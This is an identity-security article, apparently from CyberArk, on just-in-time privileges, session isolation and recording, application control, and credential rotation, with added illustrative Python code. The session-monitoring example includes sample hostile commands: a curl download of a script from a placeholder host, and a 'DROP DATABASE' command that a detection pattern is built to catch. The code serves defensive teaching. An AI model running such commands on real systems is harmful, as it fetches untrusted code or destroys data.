The number of human and non-human identities in organizations is growing rapidly, and sooner or later each of these identities will need access to critical resources. This makes them extremely attractive to cybercriminals.
The days when only a few administrators had extensive permissions in company IT infrastructures are long gone. Most employees, applications and devices now also require such rights in order to access critical resources that they need in their everyday work. The classic definition of privileged identities therefore no longer applies, because ultimately every identity can be privileged and requires special protection. To reliably protect all identities across all infrastructures, systems and applications, companies need the following five intelligent authorization controls:
Zero Standing Privileges (ZSP) and Just-in-Time Access (JIT)
Many companies permanently provide users with extensive authorizations, even if they rarely or never need the rights. The identities are not managed consistently over their entire lifecycle, and authorizations are therefore not revoked when they go unused. It is better to assign privileged access rights just-in-time, so that users are only given extended permissions when they actually need them for a specific task. The challenge is to grant permissions only for a defined period of time and then remove them again. Otherwise, rights accumulate and turn users into “super users” over time. The most modern way of assigning permissions is to give users zero standing privileges by default, so that they hold no permissions in the target applications. Using attribute-based access control (ABAC) policies, extended permissions are assigned at runtime when the user requests access and are automatically removed after the session.
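The ZSP/JIT model described above, as an added example (not CyberArk's code): identities start with no entitlements, an ABAC policy is evaluated at the moment of the request, and the resulting grant is time-boxed and revoked either when the session ends or when the grant expires. The policies, attribute names and identities are constructed placeholders.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Policy:
    """ABAC rule: every required attribute must match for the role to be granted."""
    name: str
    role: str
    required_attrs: dict
    max_minutes: int


@dataclass
class Grant:
    identity: str
    role: str
    session_id: str
    expires: datetime


class JitBroker:
    """Brokers time-boxed entitlements; nobody holds a role between sessions."""

    def __init__(self, policies):
        self.policies = list(policies)
        self.grants = {}   # (identity, session_id) -> Grant
        self.audit = []    # (action, identity, role, reason)

    def request(self, identity, attrs, role, session_id, now):
        """Evaluate the policies at runtime; return a Grant, or None if denied."""
        self._expire(now)
        for p in self.policies:
            if p.role == role and all(attrs.get(k) == v for k, v in p.required_attrs.items()):
                grant = Grant(identity, role, session_id, now + timedelta(minutes=p.max_minutes))
                self.grants[(identity, session_id)] = grant
                self.audit.append(("grant", identity, role, p.name))
                return grant
        self.audit.append(("deny", identity, role, "no matching policy"))
        return None

    def effective_roles(self, identity, now):
        """Roles the identity holds right now; expired grants never count."""
        self._expire(now)
        return sorted({g.role for (who, _), g in self.grants.items() if who == identity})

    def end_session(self, identity, session_id):
        """Revoke on session end, before the grant would have timed out."""
        grant = self.grants.pop((identity, session_id), None)
        if grant is not None:
            self.audit.append(("revoke", identity, grant.role, "session ended"))
        return grant is not None

    def _expire(self, now):
        for key, g in list(self.grants.items()):
            if g.expires <= now:
                del self.grants[key]
                self.audit.append(("revoke", g.identity, g.role, "grant expired"))


# Constructed policies (placeholders, not from any real deployment).
POLICIES = [
    Policy("db-maint-approved", "db_admin",
           {"ticket_approved": True, "device_compliant": True, "mfa": "strong"}, 60),
    Policy("app-deploy-approved", "deployer",
           {"ticket_approved": True, "pipeline_identity": True}, 30),
]


def demo():
    """Walk one human and one non-human identity through grant, use and expiry."""
    t0 = datetime(2024, 1, 15, 9, 0, tzinfo=timezone.utc)
    broker = JitBroker(POLICIES)
    alice = {"ticket_approved": True, "device_compliant": True, "mfa": "strong"}
    ci_bot = {"ticket_approved": True, "pipeline_identity": True}
    unmanaged = {"ticket_approved": True, "device_compliant": False, "mfa": "strong"}
    before = broker.effective_roles("alice", t0)
    granted = broker.request("alice", alice, "db_admin", "s1", t0)
    denied = broker.request("bob", unmanaged, "db_admin", "s2", t0)   # non-compliant device
    broker.request("ci-bot", ci_bot, "deployer", "s3", t0)
    during = broker.effective_roles("alice", t0 + timedelta(minutes=10))
    after_expiry = broker.effective_roles("alice", t0 + timedelta(minutes=61))
    bot_after = broker.effective_roles("ci-bot", t0 + timedelta(minutes=61))
    return {"before": before, "granted": granted is not None, "denied": denied is None,
            "during": during, "after_expiry": after_expiry, "bot_after": bot_after,
            "audit": broker.audit}


if __name__ == "__main__":
    for entry in demo()["audit"]:
        print(entry)
```

The audit trail is the point of the design: every grant carries the policy that justified it, and every revocation carries its reason, so a reviewer can later answer "who had what, when, and why".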
Session isolation
Session isolation protects privileged access by routing traffic between the user's device and the critical resources they access through a proxy server. This means there is no direct connection, and in the event of an attack on the user, the risk that the remote system will also be compromised is reduced.
Protection and recording of sessions
The proxy server can serve as an additional control point that monitors and records the session. All activities are recorded - down to individual mouse clicks within a web application or on a server. The recordings can be analyzed automatically to detect unusual activity that indicates a threat. In such a case, the session will be interrupted immediately.
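The monitoring step described above, as an added example (not CyberArk's code): a proxy records every event in a session and runs each one through a small set of checks (commands outside the approved task, patterns that should never appear in this session, and bursts of events that suggest scripted rather than interactive use); the first hit terminates the session and the recording up to that point is kept. The policy values and the sample sessions are constructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float      # seconds since session start, stamped by the proxy
    kind: str      # "cmd" | "click" | "upload"
    detail: str


@dataclass(frozen=True)
class SessionPolicy:
    allowed_cmds: tuple          # commands the approved task needs
    blocked_patterns: tuple      # regexes that must never appear in this session
    burst_window_s: float        # more than burst_max_events in this window is a burst
    burst_max_events: int


def check_event(ev, history, policy):
    """Return a reason string if the event is anomalous, otherwise None."""
    if ev.kind == "cmd":
        tokens = ev.detail.split()
        first = tokens[0] if tokens else ""
        if first not in policy.allowed_cmds:
            return f"command outside approved task: {first!r}"
    for pat in policy.blocked_patterns:
        if re.search(pat, ev.detail):
            return f"blocked pattern {pat!r} in {ev.kind}"
    recent = [h for h in history if ev.ts - h.ts <= policy.burst_window_s]
    if len(recent) + 1 > policy.burst_max_events:
        return f"{len(recent) + 1} events within {policy.burst_window_s}s (scripted?)"
    return None


def monitor(events, policy):
    """Replay a recording through the checks the proxy would apply live.

    Returns (recorded_events, terminated_at_index, reason); the index and
    reason are None when the session ran to completion.
    """
    recorded, history = [], []
    for i, ev in enumerate(events):
        recorded.append(ev)           # recording happens before the decision
        reason = check_event(ev, history, policy)
        if reason:
            return recorded, i, reason   # proxy cuts the connection here
        history.append(ev)
    return recorded, None, None


# Constructed policy for a "database maintenance" session.
DB_MAINT = SessionPolicy(
    allowed_cmds=("psql", "pg_dump", "ls", "cd", "exit"),
    blocked_patterns=(r"DROP\s+DATABASE",),
    burst_window_s=2.0,
    burst_max_events=10,
)

# Constructed recordings (not real sessions).
GOOD = [Event(0.0, "cmd", "psql -d inventory"),
        Event(5.0, "cmd", "pg_dump inventory"),
        Event(9.0, "cmd", "exit")]
OFF_TASK = [Event(0.0, "cmd", "psql -d inventory"),
            Event(4.0, "cmd", "ls"),
            Event(6.0, "cmd", "curl http://files.example.invalid/tool.sh")]
DESTRUCTIVE = [Event(0.0, "cmd", "psql -d inventory"),
               Event(3.0, "cmd", 'psql -c "DROP DATABASE inventory"')]
SCRIPTED = [Event(0.1 * i, "click", f"button#row{i}") for i in range(15)]


if __name__ == "__main__":
    for name, session in [("good", GOOD), ("off-task", OFF_TASK),
                          ("destructive", DESTRUCTIVE), ("scripted", SCRIPTED)]:
        _, idx, why = monitor(session, DB_MAINT)
        print(f"{name:12s} terminated_at={idx} reason={why}")
```

The checks are ordered cheapest first, and each returns a human-readable reason, since the termination itself is only useful if the responder can read from the recording why it happened.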
Application control on the endpoint
Comprehensive, policy-based application control helps protect endpoints and create a secure work environment for every user group. It enforces least privilege principles on endpoints and takes into account the application context and various parameters to decide whether to allow or block the execution of applications, scripts and other activities.
Credentials and Secrets Management
Credentials such as usernames and passwords are necessary to reliably identify identities. Credential management not only manages passwords, keys and other credentials, but also monitors compliance with password guidelines and rotates passwords or keys according to defined specifications, such as a schedule or certain events. Secrets management allows similar security policies to be enforced for non-human identities, such as those used in bots, scripts, cloud applications and IoT devices.
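The two policy checks mentioned above, as an added example (not CyberArk's code): a password-guideline check applied to a proposed new value, and a rotation check over an inventory of human and non-human credentials that flags a credential when it exceeds its maximum age for its kind or when a defined event (here, an owner leaving or a secret being exposed) requires rotation regardless of age. The inventory, event names and age limits are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass(frozen=True)
class Credential:
    name: str
    kind: str            # "password" | "ssh_key" | "api_key"
    owner_type: str      # "human" | "non_human"
    last_rotated: datetime


@dataclass(frozen=True)
class RotationPolicy:
    max_age_days: dict       # kind -> maximum age in days
    rotate_on_events: tuple  # event names that force rotation regardless of age
    min_password_len: int = 14
    min_char_classes: int = 3


def password_findings(account, password, policy):
    """Check a proposed password against the guideline; empty list means compliant."""
    findings = []
    if len(password) < policy.min_password_len:
        findings.append(f"length {len(password)} below minimum {policy.min_password_len}")
    classes = sum([any(c.islower() for c in password),
                   any(c.isupper() for c in password),
                   any(c.isdigit() for c in password),
                   any(not c.isalnum() for c in password)])
    if classes < policy.min_char_classes:
        findings.append(f"only {classes} character classes, need {policy.min_char_classes}")
    if account.split("@")[0].lower() in password.lower():
        findings.append("contains the account name")
    return findings


def rotation_findings(creds, events, policy, now):
    """Return (credential name, reason) for every credential that must be rotated now."""
    forced = {}
    for name, event in events:            # scheduled check plus event-driven triggers
        if event in policy.rotate_on_events:
            forced.setdefault(name, event)
    out = []
    for c in creds:
        age = (now - c.last_rotated).days
        limit = policy.max_age_days[c.kind]
        if c.name in forced:
            out.append((c.name, f"event '{forced[c.name]}' requires rotation"))
        elif age > limit:
            out.append((c.name, f"{c.kind} age {age}d exceeds {limit}d"))
    return sorted(out)


# Constructed policy and inventory (placeholders, not from any real environment).
POLICY = RotationPolicy(
    max_age_days={"password": 90, "ssh_key": 180, "api_key": 30},
    rotate_on_events=("owner_left", "exposed_in_log"),
)
NOW = datetime(2024, 3, 1, tzinfo=timezone.utc)
INVENTORY = [
    Credential("alice@corp", "password", "human", NOW - timedelta(days=100)),
    Credential("svc-backup", "ssh_key", "non_human", NOW - timedelta(days=10)),
    Credential("api-weather", "api_key", "non_human", NOW - timedelta(days=20)),
    Credential("svc-deploy", "api_key", "non_human", NOW - timedelta(days=45)),
]
EVENTS = [("svc-backup", "owner_left"), ("api-weather", "login_success")]


if __name__ == "__main__":
    for name, reason in rotation_findings(INVENTORY, EVENTS, POLICY, NOW):
        print(f"rotate {name}: {reason}")
    print(password_findings("alice@corp", "alice2024", POLICY))
```

Non-human identities go through exactly the same check as human ones; the only difference in practice is that the rotation for a service account or bot is executed by the secrets manager and pushed to the consuming workload rather than performed by a person.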
“Cyber attacks on all types of identities are continually increasing and becoming more sophisticated,” emphasizes Fabian Hotarek, Solutions Engineering Manager at CyberArk. “That’s why organizations need a thoughtful identity security strategy with intelligent permission controls to protect human and non-human identities and minimize the risk associated with credential theft and privilege abuse.”
More at Cyberark.com
About CyberArk
CyberArk is the global leader in identity security. With Privileged Access Management as a core component, CyberArk provides comprehensive security for any identity - human or non-human - across business applications, distributed work environments, hybrid cloud workloads and DevOps lifecycles. The world's leading companies rely on CyberArk to secure their most critical data, infrastructure and applications. Around a third of the DAX 30 and 20 of the Euro Stoxx 50 companies use CyberArk's solutions.